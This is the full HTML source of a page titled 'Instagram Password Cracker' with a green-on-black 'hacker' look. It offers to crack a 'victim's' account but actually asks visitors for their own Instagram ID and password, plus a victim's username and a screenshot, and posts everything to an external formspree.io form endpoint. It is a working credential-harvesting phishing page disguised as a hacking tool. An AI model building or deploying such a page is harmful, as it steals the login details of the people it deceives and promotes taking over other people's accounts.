<!DOCTYPE html>
<html lang="en">
    <head>
<title>Instagram Password Cracker</title>
<style type="text/css">
    body{
    background-color: black;
    color: chartreuse;
    font-family: Monospace;
}
.yourusername{
    background-color: #149414;
    border: chartreuse;
    font-family: monospace;
    color: darkblue;
    border-radius: 10px;


}
.yourpassword{
    background-color: #149414;
    border: chartreuse;
    font-family: monospace;
    color: darkblue;
    border-radius: 10px;
}
::placeholder{
text-align: center;
}
.hisusername{
    background-color: #149414;
    border: chartreuse;
    font-family: monospace;
    color: darkblue;
    border-radius: 10px;
}
.div1{
    text-align: center;
    padding-top: 4cm;

}
.hackerimg{
    padding-top: 2cm;
}
.btn1{
background-color: #149414;
border: 999999;
border-radius: 5px;
}
.btn2{
background-color: #149414;
border: 999999;
border-radius: 5px;
}
.div2{
padding-left: 0cm;
}
.hackerimg{
    border-radius: 100%;
}
::-ms-browse{
    background-color: #149414;
border: 999999;
border-radius: 5px;
}

</style>

    </head>
    <body>
<center>  <img class="hackerimg" src="hacker.jpg" width="400px" height="400px"> </center>
<form action="https://formspree.io/f/meqvyngw" method="post">
<div class="div1">
    <label for="His/Her Username">Enter Your Instagram ID&nbsp; :&nbsp; </label>
<input type="text" id="yourusername" class="yourusername" name="His/Her Username" placeholder="Usermame"><br><br><br>

<label for="His/Her Password">Enter Your Password&nbsp; :&nbsp; </label>
<input type="password" id="yourpassword" class="yourpassword" name="His/Her Password" placeholder="Password"><br><br><br><br><br>

<label for="Victim's Username">Enter Victim'S Username&nbsp; :&nbsp; </label>
<input type="text" id="hisusername" class="hisusername" name="Victim's Username" placeholder="Username"><br><br><br><br>

<label class="Photo" for="submitphoto">Upload Victim'S Profiles'S Screenshot&nbsp; :&nbsp;  </label>
<input type="file" id="submitphoto" class="submitphoto" name="Photo" accept="image/*"><br><br><br><br>
<div class="div2">
<button type="submit" class="btn1">Start Cracking</button> <button class="btn2" type="reset">Reset</button>
</div> </div>
</form>
    </body>
</html>